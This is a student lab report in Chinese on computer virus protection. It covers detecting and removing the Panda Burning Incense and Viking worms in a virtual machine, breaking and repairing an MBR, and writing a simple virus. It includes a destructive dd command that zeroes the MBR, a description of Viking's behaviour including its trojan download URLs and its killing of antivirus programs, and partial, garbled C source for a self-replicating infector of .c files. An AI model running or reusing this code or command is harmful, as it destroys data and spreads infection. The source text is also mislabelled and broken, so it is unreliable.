计算机病毒防护技术实验报告

1、计算机病毒防护技术实验报告学院： 计算机科学与技术 班级： 20110616 姓名： 曾江东 学号： 2011061624 成绩： 2014年10月实验1 典型病毒的检测1.1 实验名称熊猫烧香病毒的检测1.2 实验目的掌握典型病毒的检测方法，掌握熊猫烧香病毒的检测方法，掌握威金病毒的检测方法。1.3 实验环境微机1台（windows 9x2000xp操作系统），熊猫烧香病毒样本、威金病毒样本，熊猫烧香病毒专杀工具、威金病毒专杀工具，vmware虚拟机软件。1.4 实验内容及要求1.4.1 熊猫烧香病毒的检测1、 备好病毒样本先准备一张含有熊猫烧香病毒的软盘或光盘，或带有熊猫烧香病毒的u盘。2

2、、 运行vmware虚拟机软件。为了整个计算机本身的安全或整个实验室系统的安全，让实验在虚拟的环境下进行，3、 检测干净系统4、 种植熊猫烧香病毒插入含有熊猫烧香病毒的u盘、光盘或者软盘，点击含有熊猫烧香病毒文件夹下的setup.exe文件，这时就将熊猫烧香病毒种植到计算机系统中了。5、 检测中毒后的系统6、 得出实验结论1.3.2 威金病毒的检测1、 备好病毒样本2、 先准备一张含有威金病毒的软盘或光盘，或带有威金病毒的u盘。3、 运行vmware虚拟机软件。4、 为了整个计算机本身的安全或整个实验室系统的安全，让实验在虚拟的环境下进行，5、 检测干净系统6、 种植威金病毒插入含有威金病毒的

3、u盘、光盘或者软盘，点击含有威金病毒文件夹下的威金文件，这时就将威金病毒种植到计算机系统中了。7、 检测中毒后的系统8、 实验结论1.5 实验设计与实验步骤1. 运行vmware虚拟机软件。2. 插入含有熊猫烧香病毒的u盘、光盘或者软盘，点击含有熊猫烧香病毒文件夹下的setup.exe文件，这时就将熊猫烧香病毒种植到计算机系统中了。3. 查看磁盘是否有一些exe文件的图标被改成了一个座立的熊猫手里捧着三根香。4. 用熊猫烧香病毒专杀工具检测系统是否中毒。1.6 实验过程与分析通过查看系统磁盘的一些文件，发现一些exe文件确实被改成了熊猫图标，随后利用熊猫烧香病毒专杀工具也检测出系统确实中毒1.

4、7 实验结果总结成功将熊猫烧香病毒植入电脑，并成功检测出来。1.8 心得体会感觉将病毒从虚拟的世界弄了出来。实验2 典型病毒的清除2.1 实验名称熊猫烧香病毒的清除2.2 实验目的掌握典型病毒的清除方法，掌握熊猫烧香病毒的清除方法，掌握威金病毒的检清除方法。2.3 实验环境微机1台（windows9x2000xp操作系统），熊猫烧香病毒样本、威金病毒样本，熊猫烧香病毒专杀工具、威金病毒专杀工具，vmware虚拟机软件。2.4 实验内容及要求2.4.1 熊猫烧香病毒的清除(1) 熊猫症状表现为:(1.1) 某些exe文件的图标被改成一个座立的熊猫手里捧着三根香,因此得名,(1.2) 隐藏文件属性

5、无法修改，即显示所有隐藏文件的勾选去掉也不能显示隐藏文件；(1.3) 双击分区盘符无法打开显示内容，必须通过右键打开才可以打开；如果你的电脑出现以上症状那一定是中着了！可以通过以下手工删除（删除前断开网络）(2) 手工清除：(2.1) 清除病毒第一步：点击“开始-运行”，输入ntsd -c q -pn spoclsv.exe并确定，结束病毒的进程。（或进入到文件夹c:windows(windows2000下为winnt, windowsxp下为windows)system32drivers中修改spoclsv.exe的文件名为其他的.exe文件），之后我们就可以进入到任务管理器和注册表中了。第

6、二步：在注册表中寻找“hkey_local_machinesoftwaremicrosoftwindowscurrentversionexploreradvancedfolderhiddenshowall”,将checkedvalue的值改为1。打开“hkey_current_usersoftwaremicrosoftwindowscrrentversionrun”，将svcshare的项目删除。第三步：删除硬盘各分区根目录下的setup.exe和autorun.inf文件；删除掉c:windowssystem32drivers下的spoclsv.exe文件。第四步：搜索硬盘上的网页格式文件，

7、找到其中类似”“的文字，将其删除。被嵌入的代码可能是其他的网站。(2.2) 显示出被隐藏的系统文件 运行regedit hkey_local_machinesoftwaremicrosoftwindowscurrentversionexploreradvancedfolderhiddenshowall，将checkedvalue键值修改为1 这里要注意，病毒会把本来有效的dword值checkedvalue删除掉，新建了一个无效的字符串值checkedvalue，并且把键值改为0！我们将这个改为1是毫无作用的。（有部分病毒变种会直接把这个checkedvalue给删掉，只需和下面一样，自己再重

8、新建一个就可以了） 方法：删除此checkedvalue键值，单击右键 新建dword值命名为checkedvalue，然后修改它的键值为1，这样就可以选择“显示所有隐藏文件”和“显示系统文件”。 在文件夹工具文件夹选项中将系统文件和隐藏文件设置为显示 重启电脑后，发现杀毒软件可以打开，分区盘双击可以打开了。(3) 如何防范”熊猫烧香“病毒第一，该病毒会利用ie，qq，uc等的漏洞进行传播。所以需要即使安装他们的最新补丁程序。第二，计算机应设置复杂的密码，以防止病毒通过局域网传播。第三，关闭系统的”自动运行“功能，防止病毒通过u盘，移动硬盘等侵入你的电脑。(4) 附：结束进程的方法：调出win

9、dows任务管理器(ctrl+alt+del),发现通过简单的右击当前用户名的*.exe来结束进程是行不通的.会弹出该进程为系统进程无法结束的提醒框;鼠标右键点击任务栏，选择任务管理器。点击菜单查看(v)选择列(s).，在弹出的对话框中选择pid（进程标识符），并点击确定。找到映象名称为*.exe，并且用户名不是system的一项，记住其pid号.点击开始-“运行”，输入cmd，点击确定打开命令行控制台。输入ntsd c q -p (pid)，比如我的计算机上就输入ntsd c q -p 1 威金病毒的清除病毒名称 “威金（worm.viking）” 病毒别名 virus.w

10、in32.delf.62976 kaspersky, w32/hllp.philis.j mcafee,w32.looked symantec net-worm.win32.zorin.a 病毒型态 worm (网络蠕虫) 影响平台 windows 95/98/me , windows nt/2000/xp/2003 一、worm.viking 病毒的特点:worm.viking 病毒的行为：该病毒为windows平台下集成可执行文件感染、网络感染、下载网络木马或其它病毒的复合型病毒，worm.viking 病毒运行后将自身伪装成系统正 常文件，以迷惑用户，通过修改注册表项使病毒开机时可以自动

11、运行，同时worm.viking病毒通过线程注入技术绕过防火墙的监视，连接到病毒作者指定的 网站下载特定的木马或其它病毒，同时病毒运行后枚举内网的所有可用共享，并尝试通过弱口令方式连接感染目标计算机。运行过程过感染用 户机器上的可执行文件，造成用户机器运行速度变慢，破坏用户机器的可执行文件，给用户安全性构成危害。worm.viking 病毒主要通过共享目录、文件捆绑、运行被感染病毒的程序、可带病毒的邮件附件等方式进行传播。 1、worm.viking病毒运行后将自身复制到windows或相关文件夹下，名为rundl132.exe或者rundll32.exe。2、worm.viking病毒运行后

12、，将病毒体复制到windows目录下为logo_1.exe、vdll.dll及zvdll.exe等文件。4、worm.viking病毒搜索所有可用分区中的大小为27kb-10mb的exe文件及rar文件并感染，症状就是文件图标被修改，在所有文件夹中生成_desktop.ini 文件(属性:系统、隐藏)。5、worm.viking病毒会尝试修改%sysroot%system32driversetchosts文件。6、worm.viking病毒通过添加如下注册表项实现病毒开机自动运行: hkey_local_machinesoftwaremicrosoftwindowscurrentversion

13、run load=c:winntrundl132.exe hkey_current_usersoftwaremicrosoftwindows ntcurrentversionwindows load=c:winntrundl132.exe7、worm.viking病毒运行时尝试查找窗体名为:ravmonclass的程序，查找到窗体后发送消息关闭该程序。8、枚举以下杀毒软件进程名，查找到后终止其进程: ravmon.exe eghost.exe mailmon.exe kavpfw.exe iparmor.exe ravmond.exe9、病毒尝试利用以下命令终止相关杀病毒软件：net stop

14、 kingsoft antivirus service10、发送icmp探测数据hello,world，判断网络状态，网络可用时，枚举内网所有共享主机，并尝试用弱口令连接ipc$、admin$等共享目录，连接成功后进行网络感染。11、不感染系统文件夹中的文件，如windows、system、system32、winnt等等。12、枚举系统进程，尝试将病毒dll(vdll.dll)选择性注入explorer、iexplore进程。13、当外网可用时，被注入的dll文件尝试连接以下网站下载并运行相关程序:http:/www.17*.com/gua/zt.txt保存为:c:1.txthttp:/ww

15、w.17*.com/gua/wow.txt保存为:c:1.txthttp:/www.17*.com/gua/mx.txt保存为:c:1.txthttp:/www.17*.com/gua/zt.exe保存为:%systemroot%sy.exehttp:/www.17*.com/gua/wow.exe保存为:%systemroot%1sy.exehttp:/www.17*.com/gua/mx.exe保存为:%systemroot%2sy.exe 注：三个程序都为木马程序 14、修改注册表将启动文件及内容添加到以下相关注册表项：hkey_local_machinesoftwaremicrosof

16、twindowscurrentversionrun目录下的运行rundll32.exe的值。 hkey_local_machinesoftwaresoftdownloadwwwauto=1 hkey_local_machinesoftwaremicrosoftwindowsver_down0=boot loader+ver_down1=boot loadertimeout=30operating systemsmulti(0)disk(0)rdisk(0)partition(1)windows=microsoft windows xp professional /ver_down2=defau

17、lt=multi(0)disk(0)rdisk(0)partition(1)windowsoperating systemsmulti(0)disk(0)rdisk(0)partition(1)windows=microsoft windows xp professional / 主要症状: 1、占用大量网速，使机器使用变得极慢。 2、会捆绑所有的exe文件，只要一运用应用程序，在winnt下的logo1.exe图标就会相应变成应用程序图标。 3、有时还会时而不时地弹出一些程序框，有时候应用程序一起动就出错，有时候起动了就被强行退出。 4、阻止以下杀毒软件的运行,包括卡八斯基、金山公司的毒霸、

18、瑞星等98%的杀毒软件运行。 5、访问部分反病毒安全网站时，浏览器就会重定向到49 详细技术信息： 病毒运行后，在%windir%生成 logo1_.exe 同时会在windws根目录生成一个名为virdll.dll的文件。 该蠕虫会在系统注册表中生成如下键值： hkey_local_machinesoftwaresoftdownloadwww auto = 1 病毒感染运行windows操作系统的计算机，并且通过开放的网络资源传播。一旦安装，蠕虫将会感染受感染计算机中的.exe文件。 该蠕虫是一个大小为82k的windows pe可执行文件。通过本地网络传播。该蠕虫会

19、将自己复制到下面网络资源： admin$ ipc$二、手动清除病毒方法在进程中找到并结束logo1_.exe、rundl132.exe进程 1. 找到并删除%windir%下的logo1_.exe、rundl132.exe、vdll.dll、dll.dll文件 （部分文件不一定存在）2. 打开注册表，索引到hkey_local_machinesoftwaresoftdownloadwww，删除auto键值 3. 打开注册表，索引到hkey_current_usersoftwaremicrosoftwindows ntcurrentversionwindows，删除load键值 4. 打开%sy

20、stem%driversetc下hosts文件，删除“ localhost”一行后所有内容 5. 下载”worm.viking专杀工具“，在安全模式下全盘杀毒。 6. 插入系统光盘，重做系统 备注:输入regedit进入系统注册表，查找到hkey_local_machinesoftware microsoftwindowscurrentversionrun删除字符串load=c:windows rundl132.exe查找到hkey_current_usersoftwaremicrosoftwindows nt currentversionwindows删除字符串load=c

21、:windowsrundl132.exe查找到hkey_local_machinesoftware删除下面整个soft项，其中包括所带的downloadwww。查找到hkey_local_machinesoftwaremicrosoftwindows删除所有ver_down数字的字符串值。另外一个方法： 第一步、 用同时按下ctrl,alt,del三键打开任务管理器,结束logo1_.exe进程. 第二步、 删除操作系统盘(一般是c盘)winnt目录下的logo1_.exe文件. 可以看出,以上两步是很普通的,大部分人都会,关键是第三步. 第三步、 在操作系统盘(一般是c盘)winnt目录下,

22、创建一个文件夹(记住是文件夹而不是文件),文件夹名为logo1_.exe,并设置该文件夹的属性为只读+隐藏. 这样logo1_.exe病毒再也无法运行了,也就是它的破坏作用(比如降低网速)也消失了.唯一的缺陷就是那些变色的应用程序图标还是依旧.如果你希望应用程序的图标恢复,那么(1)你可以重装系统,记住重装系统后一定要在winnt目录下,创建一个名叫logo1_.exe文件夹并设置该文件夹的属性为只读+隐藏,以防再次感染，使电脑得到免疫.也可以(2)等到能够杀该病毒的软件诞生为止。杀毒原理：创建logo1_.exe文件夹,使无法创建logo1_.exe文件,把文件夹设为只读+隐藏使安全性更高.

23、2.5 实验设计与实验步骤1. 首先点击“开始-运行”，输入ntsd -c q -pn spoclsv.exe并确定，结束病毒的进程。（或进入到文件夹c:windows(windows2000下为winnt, windowsxp下为windows)system32drivers中修改spoclsv.exe的文件名为其他的.exe文件），之后我们就可以进入到任务管理器和注册表中了。2. 在注册表中寻找“hkey_local_machinesoftwaremicrosoftwindowscurrentversionexploreradvancedfolderhiddenshowall”,将chec

24、kedvalue的值改为1。打开“hkey_current_usersoftwaremicrosoftwindowscrrentversionrun”，将svcshare的项目删除。3. 删除硬盘各分区根目录下的setup.exe和autorun.inf文件；删除掉c:windowssystem32drivers下的spoclsv.exe文件。4. 搜索硬盘上的网页格式文件，找到其中类似”“的文字，将其删除。被嵌入的代码可能是其他的网站。5. 运行regedit hkey_local_machinesoftwaremicrosoftwindowscurrentversionexplorerad

25、vancedfolderhiddenshowall，将checkedvalue键值修改为1 这里要注意，病毒会把本来有效的dword值checkedvalue删除掉，新建了一个无效的字符串值checkedvalue，并且把键值改为0！我们将这个改为1是毫无作用的。（有部分病毒变种会直接把这个checkedvalue给删掉，只需和下面一样，自己再重新建一个就可以了） 方法：删除此checkedvalue键值，单击右键 新建dword值命名为checkedvalue，然后修改它的键值为1，这样就可以选择“显示所有隐藏文件”和“显示系统文件”。在文件夹工具文件夹选项中将系统文件和隐藏文件设置为显示

26、重启电脑后，发现杀毒软件可以打开，分区盘双击可以打开了。2.6 实验过程与分析1. 确保所以中毒文件都删除了。2. 确保所以中毒文件都恢复了。2.7 实验结果总结 成功将电脑内的熊猫烧香病毒都清除干净了，电脑恢复正常使用。2.8 心得体会了解了这样清除电脑内的病毒，而不用因为一点小小的病毒就去检修，浪费我的时间，而可以通过自己的努力将病毒清除干净。实验3 计算机系统修复实验3.1 实验名称计算机系统修复实验3.2 实验目的掌握修复mbr的方法，在linux下通过先损坏mbr前446字节的数据来验证一下修复mbr的方法。3.3 实验环境微机1台（windows9x2000xp操作系统），vmwa

27、re虚拟机软件。3.4 实验内容及要求破坏与修复mbr。3.5 实验设计与实验步骤1. 破坏mbr数据dd if=/dev/zero of=/dev/sda bs=1 count=4462. 重新启动系统验证系统在mbr损坏的情况下不能正常启动。3. 如果系统不能正常启动了，就说明mbr被损坏了。4. 那么只有进入linux救援模式下进行mbr修复进入救援模式步骤： a.系统启动按f2（虚拟机下）修改biosb.在光盘引导启动界面，键入linux rescue此时你的操作系统是被挂载在/mnt/sysimage下，而不是在跟分区下，所以要执行chroot命令来切换挂载分区e.然后切换根目录运行

28、命令f. 使用以下命令重新安装mbr上引导装载程序的前446字节5. 最后重启系统验证一下mbr是否修复成功。3.6 实验过程与分析1. mbr损坏后，重启后发现系统不能启动了2. 将mbr修复成功后，再次重启电脑，发现系统正常启动。3.7 实验结果总结 成功将崩溃的系统修复成功，使之能正常使用。3.8 心得体会学习了一些linux系统下的知识。实验4 病毒程序和杀毒程序编程实验4.1 实验名称病毒程序和杀毒程序编程实验4.2 实验目的掌握病毒程序和杀毒程序编程方法，编程实现一个简单的病毒程序，并编写杀毒程序将其杀掉。4.3 实验环境微机一台（windows9x2000xp7操作系统），编译器

29、 dev c+4.4 实验内容及要求编写一个病毒，观察其发作现象，编写一个相应的杀毒程序，进行此病毒的检测与查杀。4.5 实验设计与实验步骤1. 运行virus.c程序，系统部分文件中病毒；2. 运行病毒清除程序reviurs.c，病毒被清除成功，系统恢复正常。4.6 实验过程与分析运行病毒程序后，通过查看系统文件，发现确实出现了病毒，说明病毒种植成功。接下来就是病毒的清除了。运行杀毒程序，重启电脑，查看系统文件，发现病毒都被清除干净。 4.7 实验结果总结成功实现了病毒程序的运行将病毒种植入电脑内，然后通过运行杀毒程序将种植的病毒清除干净。4.8 心得体会学会了简单病毒程序的编写以及其相应的

30、杀毒程序的编写。源码病毒清除程序reviurs.c/*infected*/#includestdio.h#includedos.h#includedir.hmain()viruses();intviruses_sub()structffblkffblk;intdone,i,j,k,n_line;file*virus_r,*virus_v;/*virus_r指向将被感染的文件，virus_v指向已带病毒的文件*/chara50080,b80,*p1,*p2;/*将被传染的文件读入a50080临时存放*/staticcharviruses_f=virus.c;/*文件被传染后，修改该值为自身文件名

31、*/intinclude_write;intvirus_call=0;intvirus_start=0;char*main_flag=printf,break,for,while;char*include_h=dos.h,stdio.h,dir.h;char*v_flag=infected;structdatetoday;/*virusesdisplay*/getdate(&today);/*病毒显示日期信息*/printf(todayis%d/%d/%dn,today.da_mon,today.da_day,today.da_year);/*affectviruses*/done=findf

32、irst(*.c,&ffblk,0);/*查找第一个匹配文件*/while(!done)if(strcmp(ffblk.ff_name,revirus.c)!=0)virus_r=fopen(ffblk.ff_name,r+w);if(virus_r!=null)p1=fgets(&a00,80,virus_r); if(strstr(p1,v_flag0)=null) n_line=0;/*把文件全部读入a50080*/ while(p1!=null) n_line+; p1=fgets(&an_line0,80,virus_r); if(n_line=500) fclose(virus_r

33、); return(1); fseek(virus_r,0,seek_set); virus_v=fopen(&viruses_f0,r); /*打开带病毒的文件*/ if(virus_v=null)fclose(virus_r); return(2); for(i=1;i5;i+)/*读带病毒文件前4行并写入将被传染的文件*/ p2=fgets(b,80,virus_v); if(p2=null)fclose(virus_r); fclose(virus_v); return(3);fputs(b,virus_r);for(j=0;jn_line;j+)/*把将被传染文件的原程序写回原文件*

34、/include_write=1;/*不写入病毒文件已有的包含语句*/if(strstr(&aj0,#include)!=null)for(i=0;i3;i+)if(strstr(&aj0,include_hi)!=null) include_write=-1;if(virus_call=0)/*插入调用语句，并加上回车换行*/ for(i=0;i4;i+)if(strstr(&aj0,main_flagi)!=null)for(k=0;k80;k+) bk=0;strcpy(&b0,viruses();); b10=13; b11=10;fputs(b,virus_r);virus_call

35、=1; i=4;if(include_write=1)fputs(&aj0,virus_r);p1=fgets(b,80,virus_v);/*把病毒子程序写入文件*/while(p1!=null)if(virus_start=0)/*找病毒子程序的第一条语句*/ if(strstr(p1,intviruses_sub()!=null) virus_start=1; if(virus_start=1)if(strstr(p1,char)!=null)if(strstr(p1,viruses_f=)!=null)strcpy(&b29,ffblk.ff_name); i=strlen(&b0); bi=34;strcpy(&bi+1,);); bi+3=13;